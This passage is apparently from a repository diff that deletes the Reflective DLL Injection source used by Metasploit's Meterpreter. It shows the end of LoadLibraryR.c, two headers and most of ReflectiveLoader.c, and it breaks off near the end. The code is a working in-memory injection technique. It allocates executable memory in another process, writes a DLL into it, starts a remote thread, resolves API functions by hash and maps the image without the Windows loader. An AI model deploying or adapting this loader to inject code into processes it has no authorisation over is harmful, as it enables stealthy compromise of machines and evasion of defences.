// call the loaded librarys DllMain to get its HMODULE
// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
hResult = NULL;
}
// revert to the previous protection flags...
VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
}
}
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
hResult = NULL;
}
return hResult;
}
//===============================================================================================//
// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// defined in order to use the correct RDI prototypes.
// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
// Note: This function currently cant inject accross architectures, but only to architectures which are the
// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
{
LPVOID lpRemoteLibraryBuffer = NULL;
LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
HANDLE hThread = NULL;
DWORD dwReflectiveLoaderOffset = 0;
DWORD dwThreadId = 0;
__try
{
do
{
if( !hProcess || !lpBuffer || !dwLength )
break;
// check if the library has a ReflectiveLoader...
dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
if( !dwReflectiveLoaderOffset )
break;
// alloc memory (RWX) in the host process for the image...
lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !lpRemoteLibraryBuffer )
break;
// write the image into the host process...
if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
break;
// add the offset to ReflectiveLoader() to the remote library address...
lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
// create a remote thread in the host process to call the ReflectiveLoader!
hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
} while( 0 );
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
hThread = NULL;
}
return hThread;
}
//===============================================================================================//

41
c/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.h
View File

@ -1,41 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
//===============================================================================================//
#endif
//===============================================================================================//

53
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveDLLInjection.h
View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

599
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
View File

@ -1,599 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#pragma intrinsic( _ReturnAddress )
// This function can not be inlined by the compiler or we will not get the address we expect. Ideally
// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
// available (and no inline asm available under x64).
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
//===============================================================================================//
#ifdef ENABLE_OUTPUTDEBUGSTRING
#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
#else /* ENABLE_OUTPUTDEBUGSTRING */
#define OUTPUTDBG(str) do{}while(0)
#endif
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA = NULL;
GETPROCADDRESS pGetProcAddress = NULL;
VIRTUALALLOC pVirtualAlloc = NULL;
NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
#ifdef ENABLE_STOPPAGING
VIRTUALLOCK pVirtualLock = NULL;
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
OUTPUTDEBUG pOutputDebug = NULL;
#endif
USHORT usCounter;
// the initial location of this image in memory
ULONG_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
ULONG_PTR uiBaseAddress;
// variables for processing the kernels export table
ULONG_PTR uiAddressArray;
ULONG_PTR uiNameArray;
ULONG_PTR uiExportDir;
ULONG_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
ULONG_PTR uiHeaderValue;
ULONG_PTR uiValueA;
ULONG_PTR uiValueB;
ULONG_PTR uiValueC;
ULONG_PTR uiValueD;
ULONG_PTR uiValueE;
// STEP 0: calculate our images current base address
// we will start searching backwards from our callers return address.
uiLibraryAddress = caller();
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
#ifdef WIN_ARM
uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
#else _WIN32
uiBaseAddress = __readfsdword( 0x30 );
#endif
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the module name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
#ifdef ENABLE_STOPPAGING
usCounter++;
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
usCounter++;
#endif
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH
|| dwHashValue == GETPROCADDRESS_HASH
|| dwHashValue == VIRTUALALLOC_HASH
#ifdef ENABLE_STOPPAGING
|| dwHashValue == VIRTUALLOCK_HASH
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
|| dwHashValue == OUTPUTDEBUG_HASH
#endif
)
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
#ifdef ENABLE_STOPPAGING
else if( dwHashValue == VIRTUALLOCK_HASH )
pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
else if( dwHashValue == OUTPUTDEBUG_HASH )
pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
#endif
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
else if( (DWORD)uiValueC == NTDLLDLL_HASH )
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 1;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
// we stop searching when we have found everything we need.
if( pLoadLibraryA
&& pGetProcAddress
&& pVirtualAlloc
#ifdef ENABLE_STOPPAGING
&& pVirtualLock
#endif
&& pNtFlushInstructionCache
#ifdef ENABLE_OUTPUTDEBUGSTRING
&& pOutputDebug
#endif
)
break;
// get the next entry
uiValueA = DEREF( uiValueA );
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
#ifdef ENABLE_STOPPAGING
// prevent our image from being swapped to the pagefile
pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
#endif
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
while( uiValueA-- )
*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
while( uiValueE-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
while( uiValueD-- )
*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume there is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// iterate through all imports until a null RVA is found (Characteristics is mis-named)
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
{
OUTPUTDBG("Loading library: ");
OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
OUTPUTDBG("\n");
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
if ( !uiLibraryAddress )
{
OUTPUTDBG("Loading library FAILED\n");
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
continue;
}
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
OUTPUTDBG("Resolving function: ");
OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
OUTPUTDBG("\n");
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( ULONG_PTR );
if( uiValueD )
uiValueD += sizeof( ULONG_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
#ifdef WIN_ARM
// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
{
register DWORD dwInstruction;
register DWORD dwAddress;
register WORD wImm;
// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
// flip the words to get the instruction as expected
dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
// sanity chack we are processing a MOV instruction...
if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
{
// pull out the encoded 16bit value (the high portion of the address-to-relocate)
wImm = (WORD)( dwInstruction & 0x000000FF);
wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
// apply the relocation to the target address
dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
// now create a new instruction with the same opcode and register param.
dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
// patch in the relocated address...
dwInstruction |= (DWORD)(dwAddress & 0x00FF);
dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
// now flip the instructions words and patch back into the code...
*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
}
}
#endif
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
OUTPUTDBG("Flushing the instruction cache");
// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
